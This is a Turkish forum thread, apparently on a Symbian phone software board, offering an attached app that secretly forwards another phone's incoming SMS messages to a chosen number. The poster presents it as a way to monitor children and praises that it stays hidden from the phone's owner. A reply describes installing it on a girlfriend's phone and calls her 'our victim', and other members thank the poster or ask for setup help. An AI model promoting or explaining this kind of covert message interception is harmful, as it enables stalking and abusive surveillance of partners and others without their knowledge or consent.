dıyer teldekı sms lerı baska tele yollama

Sponsorlu Bağlantılar

yüxexes_ksk

yüxexes_ksk

Üye
    Konu Sahibi
dıyer teldekı sms lerı baska tele yollama
proyu kurduktan sonra tele hangı kısıye gitmesını ıstıyorsanız onun numarasını yazıyorsunuz ona yolluo..
yanı cocugunuza kurdunuz ondakı smslerın bı kopyasıda sıze gelıo kontrol amaclı yazılmıs bir pro..

bu tarz program elınde olan varsa paylassın arkıler faydalı bışi..

bide kişi farketmeden arka planda yapıo bu işi program en guzel yanıda o ama uygulama arka planda gözükmüyor rahat olun :))))

Ekli dosyalar

• Beğen
Tepkiler: s_uzun, Ferzan, MUHAMMED ve 6 diğerleri

Nadir

Nadir

Emekli Yönetici
konuya ön izleme eklerseniz ve birde hangi telefonlara uyumlu olduğunu belirtirseniz konu tam olacak.

yüxexes_ksk

yüxexes_ksk

Üye
    Konu Sahibi
kardes denedıgım teller 5800 ve n97 v3 ve ustleri ile uyumlu program on izleme koymadım nasıl konulucagını bılmıyorum

olay basıt zaten proyu kuruyon normal bı sekılde acıon numaranı yazıon zaten basıt bi yazılım bu kdr

hyrlı olsun :))

--------------- Ekleme ---------------

deneyen bi arkadas yorum yaparsa daha ii olur dıyer kullanıcılar içinde

topal_solucan

Üye
hic anlamadım ne işe yaradıgını valla :/ ne numarası nereye kuruyoruzz

yok mu kullanan

muxo

muxo

Üye
programın mantıgını anladım. örnek olarak bu programı sevgilinizin telefonuna kuruyorsunuz.sonra programı açıp kendi numaranızı giriyorsunuz. kurbanımızın yani sevgiliizin millete attıgı mesajların bir kopyası o an size de geliyor.
ayrıca diyer ne????? o diğer olmasın sakın. ilkokul terk

Ferzan

Ferzan

Üye
lisan s kodu nedir acaba

SymbianHacker

SymbianHacker

Kapalı Hesap
:tşk:

yeditepeli34

Üye
programı kurdugun telefona mesaj gelınce yazılan numaraya aynı mesaj gidiyor programın kurulu oldugu telefon gönderince msj gelmıyor ben ayarda yanlışlıkmı yaptım acaba

muftela

Üye
denemek gerek. teşekkürler.

kadikoy

kadikoy

Üye
faturalı hatta giden mesajların gittiği numara görününce ne ola
cak...

Üst Alt